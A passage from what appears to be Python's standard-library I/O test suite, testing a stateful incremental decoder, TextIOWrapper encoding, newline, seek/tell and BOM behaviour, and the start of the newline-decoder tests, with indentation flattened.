When I is set to 0, the decoder is in variable-length mode.
- 'o' followed by a number sets the output length, O (maximum 99).
- Any other word is converted into a word followed by a period on
the output. The output word consists of the input word truncated
or padded out with hyphens to make its length equal to O. If O
is 0, the word is output verbatim without truncating or padding.
I and O are initially set to 1. When I changes, any buffered input is
re-scanned according to the new I. EOF also terminates the last word.
"""
def __init__(self, errors='strict'):
codecs.IncrementalDecoder.__init__(self, errors)
self.reset()
def __repr__(self):
return '<SID %x>' % id(self)
def reset(self):
self.i = 1
self.o = 1
self.buffer = bytearray()
def getstate(self):
i, o = self.i ^ 1, self.o ^ 1 # so that flags = 0 after reset()
return bytes(self.buffer), i*100 + o
def setstate(self, state):
buffer, io = state
self.buffer = bytearray(buffer)
i, o = divmod(io, 100)
self.i, self.o = i ^ 1, o ^ 1
def decode(self, input, final=False):
output = ''
for b in input:
if self.i == 0: # variable-length, terminated with period
if b == ord('.'):
if self.buffer:
output += self.process_word()
else:
self.buffer.append(b)
else: # fixed-length, terminate after self.i bytes
self.buffer.append(b)
if len(self.buffer) == self.i:
output += self.process_word()
if final and self.buffer: # EOF terminates the last word
output += self.process_word()
return output
def process_word(self):
output = ''
if self.buffer[0] == ord('i'):
self.i = min(99, int(self.buffer[1:] or 0)) # set input length
elif self.buffer[0] == ord('o'):
self.o = min(99, int(self.buffer[1:] or 0)) # set output length
else:
output = self.buffer.decode('ascii')
if len(output) < self.o:
output += '-'*self.o # pad out with hyphens
if self.o:
output = output[:self.o] # truncate to output length
output += '.'
self.buffer = bytearray()
return output
codecEnabled = False
@classmethod
def lookupTestDecoder(cls, name):
if cls.codecEnabled and name == 'test_decoder':
latin1 = codecs.lookup('latin-1')
return codecs.CodecInfo(
name='test_decoder', encode=latin1.encode, decode=None,
incrementalencoder=None,
streamreader=None, streamwriter=None,
incrementaldecoder=cls)
# Register the previous decoder for testing.
# Disabled by default, tests will enable it.
codecs.register(StatefulIncrementalDecoder.lookupTestDecoder)
class StatefulIncrementalDecoderTest(unittest.TestCase):
"""
Make sure the StatefulIncrementalDecoder actually works.
"""
test_cases = [
# I=1, O=1 (fixed-length input == fixed-length output)
(b'abcd', False, 'a.b.c.d.'),
# I=0, O=0 (variable-length input, variable-length output)
(b'oiabcd', True, 'abcd.'),
# I=0, O=0 (should ignore extra periods)
(b'oi...abcd...', True, 'abcd.'),
# I=0, O=6 (variable-length input, fixed-length output)
(b'i.o6.x.xyz.toolongtofit.', False, 'x-----.xyz---.toolon.'),
# I=2, O=6 (fixed-length input < fixed-length output)
(b'i.i2.o6xyz', True, 'xy----.z-----.'),
# I=6, O=3 (fixed-length input > fixed-length output)
(b'i.o3.i6.abcdefghijklmnop', True, 'abc.ghi.mno.'),
# I=0, then 3; O=29, then 15 (with longer output)
(b'i.o29.a.b.cde.o15.abcdefghijabcdefghij.i3.a.b.c.d.ei00k.l.m', True,
'a----------------------------.' +
'b----------------------------.' +
'cde--------------------------.' +
'abcdefghijabcde.' +
'a.b------------.' +
'.c.------------.' +
'd.e------------.' +
'k--------------.' +
'l--------------.' +
'm--------------.')
]
def test_decoder(self):
# Try a few one-shot test cases.
for input, eof, output in self.test_cases:
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(input, eof), output)
# Also test an unfinished decode, followed by forcing EOF.
d = StatefulIncrementalDecoder()
self.assertEqual(d.decode(b'oiabcd'), '')
self.assertEqual(d.decode(b'', 1), 'abcd.')
class TextIOWrapperTest(unittest.TestCase):
def setUp(self):
self.testdata = b"AAA\r\nBBB\rCCC\r\nDDD\nEEE\r\n"
self.normalized = b"AAA\nBBB\nCCC\nDDD\nEEE\n".decode("ascii")
support.unlink(support.TESTFN)
def tearDown(self):
support.unlink(support.TESTFN)
def test_constructor(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
t.__init__(b, encoding="latin-1", newline="\r\n")
self.assertEqual(t.encoding, "latin-1")
self.assertEqual(t.line_buffering, False)
t.__init__(b, encoding="utf-8", line_buffering=True)
self.assertEqual(t.encoding, "utf-8")
self.assertEqual(t.line_buffering, True)
self.assertEqual("\xe9\n", t.readline())
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
def test_non_text_encoding_codecs_are_rejected(self):
# Ensure the constructor complains if passed a codec that isn't
# marked as a text encoding
# http://bugs.python.org/issue20404
r = self.BytesIO()
b = self.BufferedWriter(r)
with self.assertRaisesRegex(LookupError, "is not a text encoding"):
self.TextIOWrapper(b, encoding="hex")
def test_detach(self):
r = self.BytesIO()
b = self.BufferedWriter(r)
t = self.TextIOWrapper(b)
self.assertIs(t.detach(), b)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("howdy")
self.assertFalse(r.getvalue())
t.detach()
self.assertEqual(r.getvalue(), b"howdy")
self.assertRaises(ValueError, t.detach)
def test_repr(self):
raw = self.BytesIO("hello".encode("utf-8"))
b = self.BufferedReader(raw)
t = self.TextIOWrapper(b, encoding="utf-8")
modname = self.TextIOWrapper.__module__
self.assertEqual(repr(t),
"<%s.TextIOWrapper encoding='utf-8'>" % modname)
raw.name = "dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' encoding='utf-8'>" % modname)
t.mode = "r"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name='dummy' mode='r' encoding='utf-8'>" % modname)
raw.name = b"dummy"
self.assertEqual(repr(t),
"<%s.TextIOWrapper name=b'dummy' mode='r' encoding='utf-8'>" % modname)
def test_line_buffering(self):
r = self.BytesIO()
b = self.BufferedWriter(r, 1000)
t = self.TextIOWrapper(b, newline="\n", line_buffering=True)
t.write("X")
self.assertEqual(r.getvalue(), b"") # No flush happened
t.write("Y\nZ")
self.assertEqual(r.getvalue(), b"XY\nZ") # All got flushed
t.write("A\rB")
self.assertEqual(r.getvalue(), b"XY\nZA\rB")
def test_default_encoding(self):
old_environ = dict(os.environ)
try:
# Try to get a user-preferred encoding different from the current
# locale encoding, to check that TextIOWrapper() uses the current
# locale encoding and not the user-preferred encoding (a sketch of
# that fallback follows this test).
for key in ('LC_ALL', 'LANG', 'LC_CTYPE'):
if key in os.environ:
del os.environ[key]
current_locale_encoding = locale.getpreferredencoding(False)
b = self.BytesIO()
t = self.TextIOWrapper(b)
self.assertEqual(t.encoding, current_locale_encoding)
finally:
os.environ.clear()
os.environ.update(old_environ)
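# For reference, a sketch of the fallback checked above: with no explicit
# encoding, TextIOWrapper ends up using the locale's preferred encoding
# (tty device encodings are ignored in this simplified sketch).
def _sketch_default_text_encoding(self):
    import locale
    return locale.getpreferredencoding(False)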
@support.cpython_only
def test_device_encoding(self):
# Issue 15989
import _testcapi
b = self.BytesIO()
b.fileno = lambda: _testcapi.INT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
b.fileno = lambda: _testcapi.UINT_MAX + 1
self.assertRaises(OverflowError, self.TextIOWrapper, b)
def test_encoding(self):
# Check that the encoding attribute is always set and valid
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="utf-8")
self.assertEqual(t.encoding, "utf-8")
t = self.TextIOWrapper(b)
self.assertTrue(t.encoding is not None)
codecs.lookup(t.encoding)
def test_encoding_errors_reading(self):
# (1) default
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.read)
# (2) explicit strict
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.read)
# (3) ignore
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore")
self.assertEqual(t.read(), "abc\n\n")
# (4) replace
b = self.BytesIO(b"abc\n\xff\n")
t = self.TextIOWrapper(b, encoding="ascii", errors="replace")
self.assertEqual(t.read(), "abc\n\ufffd\n")
def test_encoding_errors_writing(self):
# (1) default
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
self.assertRaises(UnicodeError, t.write, "\xff")
# (2) explicit strict
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="strict")
self.assertRaises(UnicodeError, t.write, "\xff")
# (3) ignore
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="ignore",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abcdef\n")
# (4) replace
b = self.BytesIO()
t = self.TextIOWrapper(b, encoding="ascii", errors="replace",
newline="\n")
t.write("abc\xffdef\n")
t.flush()
self.assertEqual(b.getvalue(), b"abc?def\n")
def test_newlines(self):
input_lines = [ "unix\n", "windows\r\n", "os9\r", "last\n", "nonl" ]
tests = [
[ None, [ 'unix\n', 'windows\n', 'os9\n', 'last\n', 'nonl' ] ],
[ '', input_lines ],
[ '\n', [ "unix\n", "windows\r\n", "os9\rlast\n", "nonl" ] ],
[ '\r\n', [ "unix\nwindows\r\n", "os9\rlast\nnonl" ] ],
[ '\r', [ "unix\nwindows\r", "\nos9\r", "last\nnonl" ] ],
]
encodings = (
'utf-8', 'latin-1',
'utf-16', 'utf-16-le', 'utf-16-be',
'utf-32', 'utf-32-le', 'utf-32-be',
)
# Try a range of buffer sizes to test the case where \r is the last
# character in TextIOWrapper._pending_line.
for encoding in encodings:
# XXX: str.encode() should return bytes
data = bytes(''.join(input_lines).encode(encoding))
for do_reads in (False, True):
for bufsize in range(1, 10):
for newline, exp_lines in tests:
bufio = self.BufferedReader(self.BytesIO(data), bufsize)
textio = self.TextIOWrapper(bufio, newline=newline,
encoding=encoding)
if do_reads:
got_lines = []
while True:
c2 = textio.read(2)
if c2 == '':
break
self.assertEqual(len(c2), 2)
got_lines.append(c2 + textio.readline())
else:
got_lines = list(textio)
for got_line, exp_line in zip(got_lines, exp_lines):
self.assertEqual(got_line, exp_line)
self.assertEqual(len(got_lines), len(exp_lines))
def test_newlines_input(self):
testdata = b"AAA\nBB\x00B\nCCC\rDDD\rEEE\r\nFFF\r\nGGG"
normalized = testdata.replace(b"\r\n", b"\n").replace(b"\r", b"\n")
for newline, expected in [
(None, normalized.decode("ascii").splitlines(keepends=True)),
("", testdata.decode("ascii").splitlines(keepends=True)),
("\n", ["AAA\n", "BB\x00B\n", "CCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r\n", ["AAA\nBB\x00B\nCCC\rDDD\rEEE\r\n", "FFF\r\n", "GGG"]),
("\r", ["AAA\nBB\x00B\nCCC\r", "DDD\r", "EEE\r", "\nFFF\r", "\nGGG"]),
]:
buf = self.BytesIO(testdata)
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
self.assertEqual(txt.readlines(), expected)
txt.seek(0)
self.assertEqual(txt.read(), "".join(expected))
def test_newlines_output(self):
testdict = {
"": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\n": b"AAA\nBBB\nCCC\nX\rY\r\nZ",
"\r": b"AAA\rBBB\rCCC\rX\rY\r\rZ",
"\r\n": b"AAA\r\nBBB\r\nCCC\r\nX\rY\r\r\nZ",
}
tests = [(None, testdict[os.linesep])] + sorted(testdict.items())
for newline, expected in tests:
buf = self.BytesIO()
txt = self.TextIOWrapper(buf, encoding="ascii", newline=newline)
txt.write("AAA\nB")
txt.write("BB\nCCC\n")
txt.write("X\rY\r\nZ")
txt.flush()
self.assertEqual(buf.closed, False)
self.assertEqual(buf.getvalue(), expected)
def test_destructor(self):
l = []
base = self.BytesIO
class MyBytesIO(base):
def close(self):
l.append(self.getvalue())
base.close(self)
b = MyBytesIO()
t = self.TextIOWrapper(b, encoding="ascii")
t.write("abc")
del t
support.gc_collect()
self.assertEqual([b"abc"], l)
def test_override_destructor(self):
record = []
class MyTextIO(self.TextIOWrapper):
def __del__(self):
record.append(1)
try:
f = super().__del__
except AttributeError:
pass
else:
f()
def close(self):
record.append(2)
super().close()
def flush(self):
record.append(3)
super().flush()
b = self.BytesIO()
t = MyTextIO(b, encoding="ascii")
del t
support.gc_collect()
self.assertEqual(record, [1, 2, 3])
def test_error_through_destructor(self):
# Test that the exception state is not modified by a destructor,
# even if close() fails.
rawio = self.CloseFailureIO()
def f():
self.TextIOWrapper(rawio).xyzzy
with support.captured_output("stderr") as s:
self.assertRaises(AttributeError, f)
s = s.getvalue().strip()
if s:
# The destructor *may* have printed an unraisable error, check it
self.assertEqual(len(s.splitlines()), 1)
self.assertTrue(s.startswith("Exception OSError: "), s)
self.assertTrue(s.endswith(" ignored"), s)
# Systematic tests of the text I/O API
def test_basic_io(self):
for chunksize in (1, 2, 3, 4, 5, 15, 16, 17, 31, 32, 33, 63, 64, 65):
for enc in "ascii", "latin-1", "utf-8" :# , "utf-16-be", "utf-16-le":
f = self.open(support.TESTFN, "w+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.write("abc"), 3)
f.close()
f = self.open(support.TESTFN, "r+", encoding=enc)
f._CHUNK_SIZE = chunksize
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), "abc")
cookie = f.tell()
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.read(None), "abc")
f.seek(0)
self.assertEqual(f.read(2), "ab")
self.assertEqual(f.read(1), "c")
self.assertEqual(f.read(1), "")
self.assertEqual(f.read(), "")
self.assertEqual(f.tell(), cookie)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.seek(0, 2), cookie)
self.assertEqual(f.write("def"), 3)
self.assertEqual(f.seek(cookie), cookie)
self.assertEqual(f.read(), "def")
if enc.startswith("utf"):
self.multi_line_test(f, enc)
f.close()
def multi_line_test(self, f, enc):
f.seek(0)
f.truncate()
sample = "s\xff\u0fff\uffff"
wlines = []
for size in (0, 1, 2, 3, 4, 5, 30, 31, 32, 33, 62, 63, 64, 65, 1000):
chars = []
for i in range(size):
chars.append(sample[i % len(sample)])
line = "".join(chars) + "\n"
wlines.append((f.tell(), line))
f.write(line)
f.seek(0)
rlines = []
while True:
pos = f.tell()
line = f.readline()
if not line:
break
rlines.append((pos, line))
self.assertEqual(rlines, wlines)
def test_telling(self):
f = self.open(support.TESTFN, "w+", encoding="utf-8")
p0 = f.tell()
f.write("\xff\n")
p1 = f.tell()
f.write("\xff\n")
p2 = f.tell()
f.seek(0)
self.assertEqual(f.tell(), p0)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p1)
self.assertEqual(f.readline(), "\xff\n")
self.assertEqual(f.tell(), p2)
f.seek(0)
for line in f:
self.assertEqual(line, "\xff\n")
self.assertRaises(OSError, f.tell)
self.assertEqual(f.tell(), p2)
f.close()
def test_seeking(self):
chunk_size = _default_chunk_size()
prefix_size = chunk_size - 2
u_prefix = "a" * prefix_size
prefix = bytes(u_prefix.encode("utf-8"))
self.assertEqual(len(u_prefix), len(prefix))
u_suffix = "\u8888\n"
suffix = bytes(u_suffix.encode("utf-8"))
line = prefix + suffix
with self.open(support.TESTFN, "wb") as f:
f.write(line*2)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
s = f.read(prefix_size)
self.assertEqual(s, str(prefix, "ascii"))
self.assertEqual(f.tell(), prefix_size)
self.assertEqual(f.readline(), u_suffix)
def test_seeking_too(self):
# Regression test for a specific bug
data = b'\xe0\xbf\xbf\n'
with self.open(support.TESTFN, "wb") as f:
f.write(data)
with self.open(support.TESTFN, "r", encoding="utf-8") as f:
f._CHUNK_SIZE # Just test that it exists
f._CHUNK_SIZE = 2
f.readline()
f.tell()
def test_seek_and_tell(self):
# Test seek/tell using the StatefulIncrementalDecoder; a sketch of the
# general tell()/seek() cookie pattern follows this test.
# Make the test faster by doing smaller seeks.
CHUNK_SIZE = 128
def test_seek_and_tell_with_data(data, min_pos=0):
"""Tell/seek to various points within a data stream and ensure
that the decoded data returned by read() is consistent."""
f = self.open(support.TESTFN, 'wb')
f.write(data)
f.close()
f = self.open(support.TESTFN, encoding='test_decoder')
f._CHUNK_SIZE = CHUNK_SIZE
decoded = f.read()
f.close()
for i in range(min_pos, len(decoded) + 1): # seek positions
for j in [1, 5, len(decoded) - i]: # read lengths
f = self.open(support.TESTFN, encoding='test_decoder')
self.assertEqual(f.read(i), decoded[:i])
cookie = f.tell()
self.assertEqual(f.read(j), decoded[i:i + j])
f.seek(cookie)
self.assertEqual(f.read(), decoded[i:])
f.close()
# Enable the test decoder.
StatefulIncrementalDecoder.codecEnabled = 1
# Run the tests.
try:
# Try each test case.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
test_seek_and_tell_with_data(input)
# Position each test case so that it crosses a chunk boundary.
for input, _, _ in StatefulIncrementalDecoderTest.test_cases:
offset = CHUNK_SIZE - len(input)//2
prefix = b'.'*offset
# Don't bother seeking into the prefix (takes too long).
min_pos = offset*2
test_seek_and_tell_with_data(prefix + input, min_pos)
# Ensure our test decoder won't interfere with subsequent tests.
finally:
StatefulIncrementalDecoder.codecEnabled = 0
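# The general pattern exercised by the helper above: tell() on a text stream
# returns an opaque cookie (not a character count) that seek() can later use
# to restore both the byte position and the decoder state (sketch).
def _sketch_cookie_roundtrip(self, path):
    with self.open(path, encoding="utf-8") as f:
        f.read(3)
        cookie = f.tell()        # opaque position cookie
        rest = f.read()
        f.seek(cookie)           # restores the exact decoder state
        self.assertEqual(f.read(), rest)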
def test_encoded_writes(self):
data = "1234567890"
tests = ("utf-16",
"utf-16-le",
"utf-16-be",
"utf-32",
"utf-32-le",
"utf-32-be")
for encoding in tests:
buf = self.BytesIO()
f = self.TextIOWrapper(buf, encoding=encoding)
# Check that the BOM is written only once (see issue #1753).
f.write(data)
f.write(data)
f.seek(0)
self.assertEqual(f.read(), data * 2)
f.seek(0)
self.assertEqual(f.read(), data * 2)
self.assertEqual(buf.getvalue(), (data * 2).encode(encoding))
def test_unreadable(self):
class UnReadable(self.BytesIO):
def readable(self):
return False
txt = self.TextIOWrapper(UnReadable())
self.assertRaises(OSError, txt.read)
def test_read_one_by_one(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\r\nBB"))
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, "AA\nBB")
def test_readlines(self):
txt = self.TextIOWrapper(self.BytesIO(b"AA\nBB\nCC"))
self.assertEqual(txt.readlines(), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(None), ["AA\n", "BB\n", "CC"])
txt.seek(0)
self.assertEqual(txt.readlines(5), ["AA\n", "BB\n"])
# Read in amounts equal to TextIOWrapper._CHUNK_SIZE, which is 128.
def test_read_by_chunk(self):
# make sure "\r\n" straddles the 128-char boundary.
txt = self.TextIOWrapper(self.BytesIO(b"A" * 127 + b"\r\nB"))
reads = ""
while True:
c = txt.read(128)
if not c:
break
reads += c
self.assertEqual(reads, "A"*127+"\nB")
def test_writelines(self):
l = ['ab', 'cd', 'ef']
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_userlist(self):
l = UserList(['ab', 'cd', 'ef'])
buf = self.BytesIO()
txt = self.TextIOWrapper(buf)
txt.writelines(l)
txt.flush()
self.assertEqual(buf.getvalue(), b'abcdef')
def test_writelines_error(self):
txt = self.TextIOWrapper(self.BytesIO())
self.assertRaises(TypeError, txt.writelines, [1, 2, 3])
self.assertRaises(TypeError, txt.writelines, None)
self.assertRaises(TypeError, txt.writelines, b'abc')
def test_issue1395_1(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
# read one char at a time
reads = ""
while True:
c = txt.read(1)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_2(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = ""
while True:
c = txt.read(4)
if not c:
break
reads += c
self.assertEqual(reads, self.normalized)
def test_issue1395_3(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read(4)
reads += txt.readline()
reads += txt.readline()
reads += txt.readline()
self.assertEqual(reads, self.normalized)
def test_issue1395_4(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
reads += txt.read()
self.assertEqual(reads, self.normalized)
def test_issue1395_5(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt._CHUNK_SIZE = 4
reads = txt.read(4)
pos = txt.tell()
txt.seek(0)
txt.seek(pos)
self.assertEqual(txt.read(4), "BBB\n")
def test_issue2282(self):
buffer = self.BytesIO(self.testdata)
txt = self.TextIOWrapper(buffer, encoding="ascii")
self.assertEqual(buffer.seekable(), txt.seekable())
def test_append_bom(self):
# The BOM is not written again when appending to a non-empty file
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaa'.encode(charset))
with self.open(filename, 'a', encoding=charset) as f:
f.write('xxx')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'aaaxxx'.encode(charset))
def test_seek_bom(self):
# Same test, but when seeking manually
filename = support.TESTFN
for charset in ('utf-8-sig', 'utf-16', 'utf-32'):
with self.open(filename, 'w', encoding=charset) as f:
f.write('aaa')
pos = f.tell()
with self.open(filename, 'r+', encoding=charset) as f:
f.seek(pos)
f.write('zzz')
f.seek(0)
f.write('bbb')
with self.open(filename, 'rb') as f:
self.assertEqual(f.read(), 'bbbzzz'.encode(charset))
def test_errors_property(self):
with self.open(support.TESTFN, "w") as f:
self.assertEqual(f.errors, "strict")
with self.open(support.TESTFN, "w", errors="replace") as f:
self.assertEqual(f.errors, "replace")
@support.no_tracing
@unittest.skipUnless(threading, 'Threading required for this test.')
def test_threads_write(self):
# Issue6750: concurrent writes could duplicate data
event = threading.Event()
with self.open(support.TESTFN, "w", buffering=1) as f:
def run(n):
text = "Thread%03d\n" % n
event.wait()
f.write(text)
threads = [threading.Thread(target=lambda n=x: run(n))
for x in range(20)]
for t in threads:
t.start()
time.sleep(0.02)
event.set()
for t in threads:
t.join()
with self.open(support.TESTFN) as f:
content = f.read()
for n in range(20):
self.assertEqual(content.count("Thread%03d\n" % n), 1)
def test_flush_error_on_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
def bad_flush():
raise OSError()
txt.flush = bad_flush
self.assertRaises(OSError, txt.close) # exception not swallowed
self.assertTrue(txt.closed)
def test_multi_close(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
txt.close()
txt.close()
txt.close()
self.assertRaises(ValueError, txt.flush)
def test_unseekable(self):
txt = self.TextIOWrapper(self.MockUnseekableIO(self.testdata))
self.assertRaises(self.UnsupportedOperation, txt.tell)
self.assertRaises(self.UnsupportedOperation, txt.seek, 0)
def test_readonly_attributes(self):
txt = self.TextIOWrapper(self.BytesIO(self.testdata), encoding="ascii")
buf = self.BytesIO(self.testdata)
with self.assertRaises(AttributeError):
txt.buffer = buf
def test_rawio(self):
# Issue #12591: TextIOWrapper must work with raw I/O objects, so
# that subprocess.Popen() can have the required unbuffered
# semantics with universal_newlines=True.
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n')
# Reads
self.assertEqual(txt.read(4), 'abcd')
self.assertEqual(txt.readline(), 'efghi\n')
self.assertEqual(list(txt), ['jkl\n', 'opq\n'])
def test_rawio_write_through(self):
# Issue #12591: with write_through=True, writes don't need a flush
raw = self.MockRawIO([b'abc', b'def', b'ghi\njkl\nopq\n'])
txt = self.TextIOWrapper(raw, encoding='ascii', newline='\n',
write_through=True)
txt.write('1')
txt.write('23\n4')
txt.write('5')
self.assertEqual(b''.join(raw._write_stack), b'123\n45')
def test_read_nonbytes(self):
# Issue #17106
# Crash when underlying read() returns non-bytes
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read, 1)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.readline)
t = self.TextIOWrapper(self.StringIO('a'))
self.assertRaises(TypeError, t.read)
def test_illegal_decoder(self):
# Issue #17106
# Bypass the early encoding check added in issue 20404
def _make_illegal_wrapper():
quopri = codecs.lookup("quopri")
quopri._is_text_encoding = True
try:
t = self.TextIOWrapper(self.BytesIO(b'aaaaaa'),
newline='\n', encoding="quopri")
finally:
quopri._is_text_encoding = False
return t
# Crash when decoder returns non-string
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read, 1)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.readline)
t = _make_illegal_wrapper()
self.assertRaises(TypeError, t.read)
def _check_create_at_shutdown(self, **kwargs):
# Issue #20037: creating a TextIOWrapper at shutdown
# shouldn't crash the interpreter.
iomod = self.io.__name__
code = """if 1:
import codecs
import {iomod} as io
# Avoid looking up codecs at shutdown
codecs.lookup('utf-8')
class C:
def __init__(self):
self.buf = io.BytesIO()
def __del__(self):
io.TextIOWrapper(self.buf, **{kwargs})
print("ok")
c = C()
""".format(iomod=iomod, kwargs=kwargs)
return assert_python_ok("-c", code)
def test_create_at_shutdown_without_encoding(self):
rc, out, err = self._check_create_at_shutdown()
if err:
# Can error out with a RuntimeError if the module state
# isn't found.
self.assertIn(self.shutdown_error, err.decode())
else:
self.assertEqual("ok", out.decode().strip())
def test_create_at_shutdown_with_encoding(self):
rc, out, err = self._check_create_at_shutdown(encoding='utf-8',
errors='strict')
self.assertFalse(err)
self.assertEqual("ok", out.decode().strip())
class CTextIOWrapperTest(TextIOWrapperTest):
io = io
shutdown_error = "RuntimeError: could not find io module state"
def test_initialization(self):
r = self.BytesIO(b"\xc3\xa9\n\n")
b = self.BufferedReader(r, 1000)
t = self.TextIOWrapper(b)
self.assertRaises(TypeError, t.__init__, b, newline=42)
self.assertRaises(ValueError, t.read)
self.assertRaises(ValueError, t.__init__, b, newline='xyzzy')
self.assertRaises(ValueError, t.read)
def test_garbage_collection(self):
# C TextIOWrapper objects are collected, and collecting them flushes
# all data to disk.
# The Python version has __del__, so it ends in gc.garbage instead.
with support.check_warnings(('', ResourceWarning)):
rawio = io.FileIO(support.TESTFN, "wb")
b = self.BufferedWriter(rawio)
t = self.TextIOWrapper(b, encoding="ascii")
t.write("456def")
t.x = t
wr = weakref.ref(t)
del t
support.gc_collect()
self.assertTrue(wr() is None, wr)
with self.open(support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"456def")
def test_rwpair_cleared_before_textio(self):
# Issue 13070: TextIOWrapper's finalization would crash when called
# after the reference to the underlying BufferedRWPair's writer got
# cleared by the GC.
for i in range(1000):
b1 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t1 = self.TextIOWrapper(b1, encoding="ascii")
b2 = self.BufferedRWPair(self.MockRawIO(), self.MockRawIO())
t2 = self.TextIOWrapper(b2, encoding="ascii")
# circular references
t1.buddy = t2
t2.buddy = t1
support.gc_collect()
class PyTextIOWrapperTest(TextIOWrapperTest):
io = pyio
#shutdown_error = "LookupError: unknown encoding: ascii"
shutdown_error = "TypeError: 'NoneType' object is not iterable"
class IncrementalNewlineDecoderTest(unittest.TestCase):
def check_newline_decoding_utf8(self, decoder):
# UTF-8 specific tests for a newline decoder
def _check_decode(b, s, **kwargs):
# We exercise getstate() / setstate() as well as decode()
state = decoder.getstate()
self.assertEqual(decoder.decode(b, **kwargs), s)
decoder.setstate(state)
self.assertEqual(decoder.decode(b, **kwargs), s)
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
_check_decode(b'\xa2', "")
_check_decode(b'\x88', "\u8888")
_check_decode(b'\xe8', "")
self.assertRaises(UnicodeDecodeError, decoder.decode, b'', final=True)
decoder.reset()
_check_decode(b'\n', "\n")
_check_decode(b'\r', "")
_check_decode(b'', "\n", final=True)
_check_decode(b'\r', "\n", final=True)
_check_decode(b'\r', "")
_check_decode(b'a', "\na")
_check_decode(b'\r\r\n', "\n\n")
_check_decode(b'\r', "")
_check_decode(b'\r', "\n")
_check_decode(b'\na', "\na")
_check_decode(b'\xe8\xa2\x88\r\n', "\u8888\n")
_check_decode(b'\xe8\xa2\x88', "\u8888")
_check_decode(b'\n', "\n")
_check_decode(b'\xe8\xa2\x88\r', "\u8888")
_check_decode(b'\n', "\n")
def check_newline_decoding(self, decoder, encoding):
result = []
if encoding is not None:
encoder = codecs.getincrementalencoder(encoding)()
def _decode_bytewise(s):
# Decode one byte at a time
for b in encoder.encode(s):
result.append(decoder.decode(bytes([b])))
else:
encoder = None
def _decode_bytewise(s):
# Decode one char at a time
for c in s:
result.append(decoder.decode(c))
self.assertEqual(decoder.newlines, None)
_decode_bytewise("abc\n\r")
self.assertEqual(decoder.newlines, '\n')
_decode_bytewise("\nabc")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual(decoder.newlines, ('\n', '\r\n'))
_decode_bytewise("abc")
self.assertEqual(decoder.newlines, ('\r', '\n', '\r\n'))
_decode_bytewise("abc\r")
self.assertEqual("".join(result), "abc\n\nabcabc\nabcabc")
decoder.reset()
input = "abc"
if encoder is not None:
encoder.reset()
input = encoder.encode(input)
self.assertEqual(decoder.decode(input), "abc")
self.assertEqual(decoder.newlines, None)
def test_newline_decoder(self):
encodings = (
# None meaning the IncrementalNewlineDecoder takes unicode input
# rather than bytes input
None, 'utf-8', 'latin-1',
